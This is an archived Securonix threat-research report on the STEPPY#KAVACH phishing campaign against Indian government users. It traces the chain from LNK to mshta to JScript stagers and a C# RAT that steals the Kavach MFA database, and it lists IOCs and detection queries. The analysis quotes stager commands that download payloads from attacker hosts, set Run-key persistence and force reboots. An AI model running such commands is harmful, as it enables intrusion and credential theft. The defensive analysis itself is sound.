{ "id": "602d466c-f72a-4f3c-91fa-c863967b62d2", "created_at": "2026-04-06T00:14:21.543562Z", "updated_at": "2026-04-10T03:36:50.408806Z", "deleted_at": null, "sha1_hash": "e0a0370a366efe41ef66ebed9b8885ece203bbd7", "title": "New STEPPY#KAVACH Attack Campaign Likely Targeting Indian Government: Technical Insights and Detection Using Securonix", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 8193323, "plain_text": "New STEPPY#KAVACH Attack Campaign Likely Targeting Indian\r\nGovernment: Technical Insights and Detection Using Securonix\r\nArchived: 2026-04-05 17:36:34 UTC\r\nBy Securonix Threat Labs, Threat Research: D.Iuzvyk, T.Peck, O.Kolesnikov\r\nIntroduction\r\nThe Securonix Threat Research team has recently identified a new malicious attack campaign related to a malicious threat\r\nactor (MTA) tracked by Securonix as STEPPY#KAVACH targeting victims likely associated with the Indian government.\r\nThe new malicious campaign from STEPPY#KAVACH we observed over the past few weeks appears to share many\r\ncommon TTPs with the SideCopy/APT36 threat actors that were extremely active in 2021 and were previously attributed to\r\nPakistan by some researchers.\r\nThe STEPPY#KAVACH’s malicious attack campaign we observed most recently involved infection starting with a targeted\r\nphishing campaign. .LNK files are used to initiate code execution which eventually downloads and runs a malicious C#\r\npayload, which functions as a remote access trojan (RAT).\r\nAttribution\r\nPrimary target: As mentioned, there appear to be similarities between this latest STEPPY#KAVACH attack campaign we\r\nobserved and prior campaigns launched by APT36/SideCopy/TransparentTribe et al. As with the past campaigns reported,\r\nIndian government employees appear to be the primary target in this new campaign as well.\r\nPayload delivery: The delivery method, which we will cover later in depth, involved phishing emails which would lure the\r\nuser into opening a shortcut file (.LNK) to execute a remote .HTA payload using mshta.exe.\r\nExecutable file: The RAT or executable file delivered by the initial infection stage is extremely similar to payloads\r\ndelivered in the past by SideCopy. First, the payload is coded in the C# programming languages. When looking at the\r\ndisassembled source code, many of the same functions remain the same, though renamed. Additionally, the use of Triple-DES in ECB mode to encrypt C2 communications has also been historically used in previous versions.\r\nEach of the nine samples we analyzed also contains very similar references to a .pdb file seen in the table below:\r\nRAT file name Reference\r\nmakhandood.exe G:\\VP-S-Fin\\MGLS-28112022-ALL\\cl-only-deployed\\Client\\obj\\Debug\\makhandood.pdb\r\nsolaris1.exe G:\\VP-S-Fin\\Margulas\\Client\\obj\\Debug\\solaris1.pdb\r\nsolaris.exe G:\\VP-S-Fin\\memory\\encrypt-decrypt-byte-encrypted\\encrypt-decrypt\\obj\\Debug\\solaris.pdb\r\nsolaris1.exe G:\\VP-S-Fin\\Margulas\\Client\\obj\\Debug\\solaris1.pdb\r\nsolaris.exe G:\\VP-S-Fin\\memory\\encrypt-decrypt-byte-encrypted\\encrypt-decrypt\\obj\\Debug\\solaris.pdb\r\nhttps://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nPage 1 of 13\n\nRAT file name Reference\r\nsolaris.exe G:\\VP-S-Fin\\memory\\encrypt-decrypt-byte-encrypted\\encrypt-decrypt\\obj\\Debug\\solaris.pdb\r\nsigma.exe G:\\VP-S-Fin\\Margulas\\cl-only\\Client\\obj\\Debug\\sigma.pdb\r\nsystem.exe G:\\VP-S-Fin\\remote – N\\ConsoleApplication1\\ConsoleApplication1\\obj\\Debug\\system.pdb\r\nimeg.exe\r\nG:\\VP-S-Fin\\MGLS-Client-Oct2021-fordns\\Margulas-20may2021-pharla\\cl-only\\Client\\obj\\Debug\\imeg.pdb\r\nLure document: The file used to lure the user into opening it has historically contained a reference to a news article\r\nregarding India’s government. These range from reports, meeting information, address lists, or general PDF documents. In\r\nthis recent case, the lure is a .png file containing a year-old news article.\r\nC2 Hosting provider: Each of the IP addresses discovered in the executable files appeared to share one of several hosting\r\nproviders originating from Germany.\r\nIt’s interesting to see the evolution of the RAT payload over time. While C# has been the de facto programming language for\r\nRATs leveraged by this group, code changes and improvements are common. For instance, this latest version which we’ll\r\ndive into later in the binary analysis section, allows the attacker to execute a .vbs script hosted on the attacker’s side; this is\r\nin addition to typical .exe file execution we typically see.\r\nAdditionally, the methods inside the C# code used to execute the .exe file have changed. The code no longer calls cmd.exe\r\nlike we saw in the past, rather it leverages Csharp Process.Start method. These are just a few of many examples we saw\r\nwhile analyzing various payloads over the last year.\r\nAttack overview and targets\r\nThe entire attack chain is quite robust. Most of the execution stems from script execution using JavaScript and JScript to\r\nexecute system commands on the target host.\r\nLike with many attacks we see today, the initial infection begins with a phishing email containing a compressed file\r\nattachment (11222022.zip). When opened by the user, the file contains a single shortcut file designed to trick the user into\r\nopening it.\r\nThe attack chain in its entirety can be referenced in the diagram below. We’ll break down each element of the attack chain\r\ninto individual sections later on.\r\nhttps://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nPage 2 of 13\n\nFigure 1: Sample STEPPY#KAVACH attack chain\r\nInitial infection: shortcut to code execution\r\nThreat actors are no strangers to leveraging shortcut files (.LNK) to execute code. This offers a huge amount of flexibility as\r\nthe shortcut can call any process on the target system along with any command line parameters. Typically we see cmd.exe,\r\nregsvr32.exe or rundll32.exe being called, however in this case, we observed the shortcut calling the mshta.exe process\r\ncalling a remote .hta file.\r\nFigure 2: Scanning.png shortcut properties\r\nInspecting the shortcut file, we can see that it is calling the mshta.exe process. This process is designed to execute HTML\r\napplications (.hta) files. This particular technique is currently listed as a LOLBin (living off the land binaries) file as an\r\nattacker can execute either a local or remote .hta file with embedded malicious JavaScript code.\r\nhttps://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nPage 3 of 13\n\nThe complete command would run and execute the following:\r\nmshta.exe hxxps://www.incometaxdelhi[.]org/gallery/thumnails/mix/\r\nWhich redirects to:\r\nhxxps://www.incometaxdelhi[.]org/gallery/thumnails/mix/sit.hta\r\nBy looking at the URL, the .hta file was discovered being hosted on a likely compromised website, nested inside an obscure\r\n“gallery” directory designed to store some of the site’s images.\r\nThe purpose of the shortcut file is to appear simply as “Scanimg.png” to the user, thus luring them into thinking that they are\r\nopening a harmless image file. By default Windows operating systems will hide the .LNK extension on shortcut files. As\r\nwe’ll see later on, an image will eventually be presented to the user.\r\nInitial infection: stager attack chain\r\nNext, let’s dive into the sit.hta file that was executed using the shortcut file by mshta.exe. As expected, sit.hta contains\r\nembedded JavaScript with some partially obfuscated JavaScript code along with some rather unusual variable names.\r\nFigure 3: JavaScript contained in sit.hta\r\nStager operation: sit.hta\r\nTo hide from the user, the script first sets its size to (0,0) meaning zero pixels by zero pixels. It then checks that .NET\r\nFramework v4.0.30319 is installed.\r\nAt this point it checks for the presence of the decoy .png file (8292.png). If the file does not exist, it proceeds with its\r\noperations. If the file already exists, meaning the system was previously compromised, it simply opens the png file to the\r\nuser and exits normally.\r\nCircling back to the first IF statement, there are six operations the script proceeds to execute, each in their own JScript file.\r\nAction Contents\r\nCreateTextFile:\r\nC:/ProgramData/kohl.js\r\nvar shell = new ActiveXObject(‘WScript.Shell’);var exec = shell.run(‘cmd.exe /c powershell.exe /c Invoke-WebRequest -O\r\nC:\\\\\\\\ProgramData\\\\\\\\8292.png hxxps://www.incometaxdelhi[.]org/gallery/thumnails/mix/b.php’,0,true);\r\nCreateTextFile:\r\nC:/ProgramData/kohlw.js\r\n“var shell = new ActiveXObject(‘WScript.Shell’);WScript.Sleep(35000);var exec = shell.run(‘cmd.exe /c start C:\\\\\\\\Progra\r\nCreateTextFile:\r\nC:/ProgramData/kohld.js\r\n“var shell = new ActiveXObject(‘WScript.Shell’);WScript.Sleep(100);var exec = shell.run(‘cmd.exe /c mkdir C:\\\\\\\\Program\r\nCreateTextFile:\r\nC:/ProgramData/update.js\r\n“var shell = new ActiveXObject(‘WScript.Shell’);WScript.Sleep(69000);var exec =\r\nshell.run(‘C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\\\\\powershell.exe /c Invoke-WebRequest -OutFile C:\\\r\nhxxp://155.133.23[.]244/d.php’,0,true);”\r\nhttps://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nPage 4 of 13\n\nAction Contents\r\nCreateTextFile:\r\nC:/ProgramData/parhai.js\r\n‘var oWSS = new\r\nActiveXObject(“WScript.Shell”);WScript.Sleep(15000);oWSS.RegWrite(“HKCU\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Window\r\n“C:\\\\\\\\ProgramData\\\\\\\\dvixm\\\\\\\\dvimo.exe”,”REG_SZ”);’\r\nCreateTextFile:\r\nC:/ProgramData/r.js\r\n“var shell = new ActiveXObject(‘WScript.Shell’);WScript.Sleep(200000);var exec = shell.run(‘cmd.exe /k shutdown /r /f\r\nCreateTextFile:\r\nC:/ProgramData/kohlw.js\r\n“var shell = new ActiveXObject(‘WScript.Shell’);WScript.Sleep(9000);var exec = shell.run(‘cmd.exe /c start C:\\\\\\\\Program\r\nLure file: 8292.png\r\nThe purpose of 8292.png is purely to act as a successful result of the user clicking the Scanimg.png(.lnk) file which acts as a\r\nlure for code execution. The image below shows the contents of the png file which appears to be a snippet or copy of a news\r\narticle posted on December 1st, 2021, by PIB Delhi, Ministry of Defence. It is interesting that the attackers opted to use a\r\nnews article that was out of date by exactly one year from this particular campaign. This could have been a mistake by the\r\ngroup.\r\nFigure 4: Contents of 8292.png (lure file)\r\nMoving on, each of the created .js (JScript) files created by the sit.hta file attempts to serve a single purpose. JScript files\r\nhave been linked to SideCopy operations in the past, though have been less common.\r\nJScript file: kohl.js\r\nThis script simply downloads the 8292.png lure file using a PowerShell INvoke-WebRequest. This file is downloaded from\r\nhxxps://www.incometaxdelhi[.]org/gallery/thumnails/mix/b.php and is saved to C:\\ProgramData\\8292.png\r\nJScript file: kohlw.js\r\nThis script takes the downloaded lure file (8292.png) and opens it after sleeping, or pausing execution for 35 seconds.\r\nPerhaps this long pause is to allow for enough time for the download script to complete execution.\r\nJScript file: kohld.js\r\nAfter sleeping for only 1/10th of a second, this script simply creates the following directory inside the root of ProgramData:\r\nC:\\ProgramData\\dvixm\r\nJScript file: update.js\r\nWaiting a bit longer, the script sleeps for another 69 seconds and then attempts to reach out via PowerShell to\r\nhxxp://155.133.23[.]244/d.php to download a binary file. The file is saved to C:\\ProgramData\\ as mm1.exe. We will dig into\r\nthis binary file further down.\r\nJScript file: parhai.js\r\nhttps://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nPage 5 of 13\n\nTo establish persistence, this script performs a registry edit using the RegWrite method after sleeping for another 15 seconds.\r\nThis persistence method is well documented and is commonly used by malware to assist with maintaining a presence on the\r\ntarget host. When the computer starts, programs referenced by startup/run keys will be executed.\r\nIn this case, the attackers modified the key: “HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run” with the value\r\nof “C:\\ProgramData\\dvixm\\dvimo.exe”\r\nJScript file: r.js\r\nThis script simply reboots the target system after waiting 200 seconds. Once the user logs back in, the downloaded binary\r\nshould execute in theory, and keep executing each time the system reboots.\r\nTo wrap up, the main goal of the script is to execute the binary payload (mm1.exe) after rebooting the target system by\r\nhaving it execute as a startup process via registry keys. One interesting thing to note was the possibility of an error in the\r\nscript as the binary name and path don’t match what is saved versus what the registry key references. In this case mm1.exe\r\nwould never execute. This could be an error on the attacker’s part.\r\nBinary analysis: mm1.exe\r\nBased on its capabilities which we will dive into further down, the binary file would be classified as a RAT (remote access\r\ntrojan). At a high level it allows for C2 command execution, additional payload download and execution, desktop\r\nscreenshots, and file exfiltration.\r\nThe downloaded binary payload mm1.exe is a standard PE32 Windows executable standing at only 18Kb and was built on\r\nDecember 2, 2022.\r\nThe original file name is listed as makhandood.exe with a file version of 5.58.2.9.\r\nFigure 5: mm1.exe PE data\r\nAfter decompiling the binary, the main function appears to be rather interesting. We’ll start by examining this function and\r\nbranching our way out as other functions are called.\r\nhttps://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nPage 6 of 13\n\nFigure 6: mm1.exe Main() function\r\nAt the start of the function there are a few strings being defined into “str”, “text”, “text2”, “text3”, and “text4”. The first four\r\nwhen later combined in “text4” contain the text “kavach” and “kavach.db”. The string “text4” references the user’s\r\nAppdata/Roaming folder. Putting all the pieces together we get the full path and filename referenced by the malware:\r\nC:\\Users\\username\\AppData\\Roaming\\kavachdb\\kavach.db\r\nSo what is this file? Kavach (Hindi for “armor”) is an authentication system used by the Government of India (GoI) NIC\r\nagency. Kavach provides its users with an MFA application/client used for the authentication of employee credentials. The\r\ninclusion of this particular file in the function gives us an indication that this is a very targeted attack. It’s possible that the\r\nattackers had some inside knowledge of their target’s systems or infrastructure.\r\nNote – the idea of bypassing Kavach capabilities is not new and was previously implemented by the earlier attacks involving\r\ne.g. SideCopy. Specifically, the activity from SideCopy targeting Kavach MFA was reported back in March of this year, and\r\nit would appear that this tactic remains the same today as of the end of 2022, though in the past the application itself was the\r\nlure as it posed as a Kavach installer or updater.\r\nNext, the malware calls two functions using the ThreatStart delegate. These functions are “prparingsiej” and “kutkutktak”\r\ninside the “lkar” class. This class is primarily responsible for establishing and maintaining C2 related tasks.\r\nCircling back to main, if the malware detects the presence of the kavach.db file, it attempts to initiate a connection to the C2\r\nserver and send a message back to the C2 server via the “prparingsiej” function as seen in the figure below.\r\nFigure 7: prparingsiej() function\r\nhttps://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nPage 7 of 13\n\nPivoting further, we can see that the function prparingsiej() is parsing data from the tng() class. This class contains a single\r\nIP address (155.133.23[.]244) and three ports (3309,3310,3311) that are used by the previous function to establish and\r\nexfiltrate the kavach.db file. The IP address hard coded into the binary file is the same used to download the file from the\r\noriginal JScript code. It would appear that the ports are chosen at random by called functions.\r\nFigure 8: tng class\r\nAnother interesting capability of the malware is to accept and execute commands by the attacker. The Read() method is used\r\nonce the connection has been established. The C2 communications are encrypted using Triple-DES in ECB mode which\r\nhelps enable it to hide from network IPS/IDS. As seen in the figure above, the hardcoded encryption key is “function_load“.\r\nThe method has the capability to accept five interestingly named commands which execute different functions. Let’s take a\r\nlook at each.\r\nFigure 9: Read() method\r\nThe table below is a breakdown of each of the commands and a brief overview of the commands’ capabilities.\r\nCommand Action\r\niwantmore\r\nCalls the Socket.Shutdown(SocketShutdown) method which disables send/receives on an\r\nopen socket which closes the RAT. (This is interesting as no files are cleaned. A reboot may\r\nreconnect to the C2 server).\r\nrabiapleasemujaychordo Accepts Name and Data parameters which specify a binary file name and Base64 encoded\r\ncontents.\r\nhttps://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nPage 8 of 13\n\nCommand Action\r\nWrites binary file to AppData\\(Random GUID)\\binary_name.exe.\r\nExecutes the newly written binary file.\r\ngoingdwn\r\nAccepts Name and Data parameters which specify a .vbs (Visual Basic) name and Base64\r\nencoded contents.\r\nWrites a .vbs file to AppData\\(Random GUID)\\script_name.vbs.\r\nExecutes the newly written vbs file.\r\ndorjahun A simple connectivity check.\r\ngurdaykapuray\r\nThis takes a screenshot of the user’s desktop and sends it back to the C2 server. It accepts a\r\nfew parameters such as width and height of the screenshot.\r\nDespite the small binary file size, the malware contains quite a robust feature set. Much of this stems from the fact that the\r\nmalware authors made almost no attempt to obfuscate the binary as it was a simple .NET generated executable.\r\nTo handle multiple compromised hosts the malware generates a unique ID of the target using the ID() function. It is then\r\nreferenced throughout other areas of the application when communication is established. The unique ID is generated using\r\nthe target’s Domain Name, User Name, Machine Name as seen in the figure below.\r\nUpon successful connection, data about the target is sent back to the C2 server with some strange appended strings such as\r\n“feeldizzy” and “RATI-KAM”, though the string “RATI-KAM” is later replaced by the variable OsFullName which is\r\nadmittedly strange.\r\nFigure 10: ID() tinting() functions\r\nOne particularly interesting function that was never used was the existence of a bndkrknwakro() function. This appears to\r\nperform the same task as the function referenced by the “rabiapleasemujaychordo” command which downloads a binary .exe\r\nfile and executes it on the host, with the exception of deleting the file afterward.\r\nThis appears to be leftover code from a previous version of the binary used by the same group earlier in the year. This was\r\nimproved upon by a much more streamlined function that does not call cmd.exe, but rather uses native CSharp methods to\r\nexecute a process.\r\nhttps://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nPage 9 of 13\n\nFigure 11: bndkrknwakro() function\r\nOther binary files containing very similar code were also discovered being leveraged by the same group. This year alone we\r\nwere able to find nine unique samples used by the threat actors this year alone. The primary function of each of the .exe files\r\nwas to act as a RAT. In this particular case, mm1.exe also functions as a RAT with the added functionality of looking for the\r\nMFA db file, kavach.db on carefully selected targets. Additional binary file names and hashes are listed at the end of the\r\narticle.\r\nC2 and infrastructure\r\nBoth the .hta and .js files reference two different C2 servers which the threat actors used to host payloads and launch their\r\nattacks.\r\nThe first website which was used by the .LNK file to download and execute the JavaScript found in the .hta file was hosted\r\ninside a /gallery/ directory on what appears to be a compromised website, www.incomtaxdelhi[.]org.\r\nhxxps://www.incometaxdelhi[.]org/gallery/thumnails/\r\nIt is common practice for attackers to leverage compromised legitimate websites to stage payloads and host malicious files.\r\nThis allows the attacker to leverage the legitimate website’s already established reputation to get around blacklist or IP\r\nreputation filters. Oftentimes, as with this case, the website is using a valid TLS certificate to encrypt network\r\ncommunication between server and client.\r\nAt the time of writing this article, the attacker’s malicious files which were hosted in a /mix/ directory have since been\r\nremoved.\r\nNext, the generated .js files attempt to download payloads such as 8292.png and mm1.exe from the IP address\r\n155.133.23[.]244 which is also the IP address hard coded as the C2 connection IP in the mm1.exe binary file. Interestingly\r\nenough, the IP address redirects to hxxps://email.gov[.]in when no files or directories are supplied. The IP address is hosted\r\nin Germany by the hosting provider Contabo.\r\nWe detected a similar IP address that was also redirected to mail.gov[.]in which was 78.46.21[.]248. However, in this case it\r\nwas not directly involved in the attack, but shared some striking similarities.\r\nhttps://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nPage 10 of 13\n\nFigure 12: India Kavach NIC MFA app example\r\nConclusion\r\nOverall, it is clear that this is a very targeted attack towards the Indian government. We know that the binary file mm1.exe is\r\nlooking for a very particular database file (kavach.db) which means that the attacker had inside knowledge as to their\r\nintended target. Some of this knowledge includes its security controls, such as which MFA client was being used by\r\nemployees.\r\nThe lure image also references a news article from a .gov website in India and the compromised website used by the attacker\r\nto host the malicious HTA file was also located in India. Additionally, the fact that the attacker’s C2 server redirects to an\r\nIndian government-owned email site adds more proof as to the nature and target of the attack.\r\nBased on correlated data from the binary samples obtained of the RAT used by the threat actors, this campaign has been\r\ngoing on against Indian targets undetected for the last year. Based on indicators discovered by our team recently, we can\r\nconclude that the threat actors are still active and have no plans to stop operations.\r\nSecuronix recommendations and mitigations\r\nAvoid opening email attachments or clicking embedded links from untrusted sources\r\nMonitor the usage of mshta.exe, especially making external connections\r\nDeploy additional process-level logging such as Sysmon for additional log coverage\r\nScan endpoints using the Securonix seeder hunting queries below\r\nRelevant Spotter queries\r\n(rg_functionality=”Next Generation Firewall” OR rg_functionality=”Web Proxy”) AND requesturl CONTAINS\r\n“incometaxdelhi.org/gallery/thumnails/mix/”\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction =\r\n“ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR\r\ndeviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace\r\nExecuted Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR\r\ndeviceaction = “Process Activity: Launched”) AND sourceprocessname = “mshta.exe” AND\r\n(destinationprocessname = “powershell.exe” OR destinationprocessname = “cscript.exe” OR destinationprocessname\r\nE= “wscript.exe” OR destinationprocessname = “msiexec.exe” OR destinationprocessname = “rundll32.exe” OR\r\ndestinationprocessname = “msbuild.exe”)\r\n(rg_functionality=”Firewall” OR rg_functionality=”Next Generation Firewall” OR rg_functionality=”Web Proxy”)\r\nAND ipaddress IN (“155.133.23.244″,”62.171.187.53″,”149.248.52.61”)\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction ENDS WITH “Written” OR deviceaction =\r\n“File created”) AND (customstring49 ENDS WITH “\\ProgramData\\8292.png” OR filepath ENDS WITH\r\n“\\ProgramData\\mm1.exe” OR customstring49 ENDS WITH “\\ProgramData\\kohl.js” OR customstring49 ENDS\r\nWITH “\\ProgramData\\kohlw.js” OR customstring49 ENDS WITH “\\ProgramData\\kohld.js” OR customstring49\r\nENDS WITH “\\ProgramData\\update.js” OR customstring49 ENDS WITH “\\ProgramData\\parhai.js” OR\r\ncustomstring49 ENDS WITH “\\ProgramData\\r.js” OR customstring49 ENDS WITH “\\ProgramData\\kohlw.js”)\r\nhttps://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nPage 11 of 13\n\nrg_functionality = “Endpoint Management Systems” AND deviceaction = “Network connection detected” AND\r\ndestinationprocessname = “mshta.exe” AND (destinationaddress != “10.0.0.0/8” OR destinationaddress !=\r\n“172.16.0.0/12” OR destinationaddress != “192.168.0.0/16” OR destinationaddress != “127.0.0.1” OR\r\ndestinationaddress != “127.0.0.0/8” OR destinationaddress != “169.254.0.0/16”)\r\nSome examples of relevant Securonix detection policies\r\nEDR-ALL-63-RU\r\nEDR-ALL-1001-RU\r\nEDR-ALL-79-ER\r\nEDR-ALL-185-ER\r\nEDR-ALL-1100-RU\r\nMITRE ATT\u0026CK\r\nTactic Technique\r\nInitial Access\r\nT1566: Phishing\r\nT1566.001: Phishing: Spearphishing Attachment\r\nExecution\r\nT1204.002: User Execution: Malicious File\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1059.007: Command and Scripting Interpreter: JavaScript\r\nDefense Evasion T1218.005: System Binary Proxy Execution: Mshta\r\nPersistence T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nCommand and Control\r\nT1573.001: Encrypted Channel: Symmetric Cryptography\r\nT1105: Ingress Tool Transfer\r\nT1571: Non-Standard Port\r\nExfiltration T1041: Exfiltration Over C2 Channel\r\nAnalyzed file hashes\r\nFile Name SHA256\r\n11222022.zip 889dd2abc6aa85863d6ea46c86d95050ac702c5743523ef5aeec63a8ff356d34\r\nScanimg.png.lnk e56cbac2134c6bcb67cf25428f8d7db959d341a26d81e4eb4f9f77e7186e5906\r\nmm1.exe (makhandood.exe) 36eda255b689e66fbc70ae0264eed7b79ed99022e4b3409748474d9bb73ae64e\r\nkohld.js 66c4f5b3702cc76b6ae67851835e078c16c88f716eae8375c1ba797c6eaa375f\r\nkohl.js df16aab18a13f16fa272555e6aa762f5098b0c4f06cb26bfbcc23a5f4f8668db\r\nkohlw.js 6484088f132efbd416eba7ac3f3339a41500f28bf8d58b18b4da75258c8a2fb4\r\nparhai.js d47a36fe2490e0e480dd59827495da93abe997cf20302aaedadca5988295c526\r\nr.js 5ad783061390d75d7d947b6801b0e0b8d677b656ae6508bf6d355a32ab5c2fdf\r\nAdditional Binaries\r\nsolaris1.exe c7c6ea40ce0f0f540dae8512b1b26f32f465eb70ec248aa540d119e86356afb4\r\nsolaris.exe c8127216d74724b9bbad1cffe2d00acd908c2ba664e37fe2f97f397ada5e75d6\r\nsolaris1.exe 0eb2da6e6905e46ceb2a7c50500e9a5cb2a35cd4879ad3ad78d11d6e60a82a69\r\nsolaris.exe 3a6ab95138ee9bd3a74f7c8dce93469e78588ddbfc6a44d85e9b1b849fa13ba7\r\nsigma.exe fb4a2bac3e60b6a84c7ae19e73e57f3677673823da3ce8c90dfe697313b7438c\r\nsystem.exe 963f1895a44f94c995b901a8ce896efacce0c1a8662a20ba1348eb7c6325cc19\r\nsolaris.exe cb9ab35ec79e0ccb2b567f424d4e0e7a69732ccfd0c3cdb0b06580922aa06c35\r\nimeg.exe d2bfc378333fe73770c459f5f509626991e90ea5a53f5207a2d018bd82a8fed7\r\nhttps://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nPage 12 of 13\n\nReferences:\r\n1. LOLBas Project: Mshta.exe\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Mshta/\r\n2. Talos: Transparent Tribe campaign uses new bespoke malware to target Indian government officials\r\nhttps://blog.talosintelligence.com/transparent-tribe-new-campaign/\r\n3. Talos: InSideCopy: How this APT continues to evolve its arsenal\r\nhttps://blog.talosintelligence.com/sidecopy/\r\n4. InSideCopy: How this APT continues to evolve its arsenal\r\nhttps://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388\r\n5. SideCopy APT: Connecting lures to victims, payloads to infrastructure\r\nhttps://www.malwarebytes.com/blog/threat-intelligence/2021/12/sidecopy-apt-connecting-lures-to-victims-payloads-to-infrastructure\r\n6. Operation SideCopy: An insight into Transparent Tribe’s sub-division which has been incorrectly attributed for years\r\nhttps://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf\r\nSource: https://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nhttps://www.securonix.com/blog/new-steppykavach-attack-campaign/\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.securonix.com/blog/new-steppykavach-attack-campaign/" ], "report_names": [ "new-steppykavach-attack-campaign" ], "threat_actors": [ { "id": "414d7c65-5872-4e56-8a7d-49a2aeef1632", "created_at": "2025-08-07T02:03:24.7983Z", "updated_at": "2026-04-10T02:00:03.76109Z", "deleted_at": null, "main_name": "COPPER FIELDSTONE", "aliases": [ "APT36 ", "Earth Karkaddan ", "Gorgon Group ", "Green Havildar ", "Mythic Leopard ", "Operation C-Major ", "Operation Transparent Tribe ", "Pasty Draco ", "ProjectM ", "Storm-0156 " ], "source_name": "Secureworks:COPPER FIELDSTONE", "tools": [ "CapraRAT", "Crimson RAT", "DarkComet", "ElizaRAT", "LuminosityLink", "ObliqueRAT", "Peppy", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc", "created_at": "2022-10-27T08:27:12.955905Z", "updated_at": "2026-04-10T02:00:05.376527Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "SideCopy" ], "source_name": "MITRE:SideCopy", "tools": [ "AuTo Stealer", "Action RAT" ], "source_id": "MITRE", "reports": null }, { "id": "fce5181c-7aab-400f-bd03-9db9e791da04", "created_at": "2022-10-25T15:50:23.759799Z", "updated_at": "2026-04-10T02:00:05.3002Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "Transparent Tribe", "COPPER FIELDSTONE", "APT36", "Mythic Leopard", "ProjectM" ], "source_name": "MITRE:Transparent Tribe", "tools": [ "DarkComet", "ObliqueRAT", "njRAT", "Peppy" ], "source_id": "MITRE", "reports": null }, { "id": "a4f0e383-f447-4cd6-80e3-ffc073ed4e00", "created_at": "2023-01-06T13:46:39.30167Z", "updated_at": "2026-04-10T02:00:03.280161Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [], "source_name": "MISPGALAXY:SideCopy", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b584b10a-7d54-4d05-9e21-b223563df7b8", "created_at": "2022-10-25T16:07:24.181589Z", "updated_at": "2026-04-10T02:00:04.892659Z", "deleted_at": null, "main_name": "SideCopy", "aliases": [ "G1008", "Mocking Draco", "TAG-140", "UNC2269", "White Dev 55" ], "source_name": "ETDA:SideCopy", "tools": [ "ActionRAT", "AllaKore", "Allakore RAT", "AresRAT", "Bladabindi", "CetaRAT", "DetaRAT", "EpicenterRAT", "Jorik", "Lilith", "Lilith RAT", "MargulasRAT", "ReverseRAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "abb24b7b-6baa-4070-9a2b-aa59091097d1", "created_at": "2022-10-25T16:07:24.339942Z", "updated_at": "2026-04-10T02:00:04.944806Z", "deleted_at": null, "main_name": "Transparent Tribe", "aliases": [ "APT 36", "APT-C-56", "Copper Fieldstone", "Earth Karkaddan", "G0134", "Green Havildar", "Mythic Leopard", "Opaque Draco", "Operation C-Major", "Operation Honey Trap", "Operation Transparent Tribe", "ProjectM", "STEPPY-KAVACH", "Storm-0156", "TEMP.Lapis", "Transparent Tribe" ], "source_name": "ETDA:Transparent Tribe", "tools": [ "Amphibeon", "Android RAT", "Bezigate", "Bladabindi", "Bozok", "Bozok RAT", "BreachRAT", "Breut", "CapraRAT", "CinaRAT", "Crimson RAT", "DarkComet", "DarkKomet", "ElizaRAT", "FYNLOS", "Fynloski", "Jorik", "Krademok", "Limepad", "Luminosity RAT", "LuminosityLink", "MSIL", "MSIL/Crimson", "Mobzsar", "MumbaiDown", "Oblique RAT", "ObliqueRAT", "Peppy RAT", "Peppy Trojan", "Quasar RAT", "QuasarRAT", "SEEDOOR", "Scarimson", "SilentCMD", "Stealth Mango", "UPDATESEE", "USBWorm", "Waizsar RAT", "Yggdrasil", "beendoor", "klovbot", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "c68fa27f-e8d9-4932-856b-467ccfe39997", "created_at": "2023-01-06T13:46:38.450585Z", "updated_at": "2026-04-10T02:00:02.980334Z", "deleted_at": null, "main_name": "Operation C-Major", "aliases": [ "APT36", "APT 36", "TMP.Lapis", "COPPER FIELDSTONE", "Storm-0156", "Transparent Tribe", "ProjectM", "Green Havildar", "Earth Karkaddan", "C-Major", "Mythic Leopard" ], "source_name": "MISPGALAXY:Operation C-Major", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434461, "ts_updated_at": 1775792210, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e0a0370a366efe41ef66ebed9b8885ece203bbd7.pdf", "text": "https://archive.orkl.eu/e0a0370a366efe41ef66ebed9b8885ece203bbd7.txt", "img": 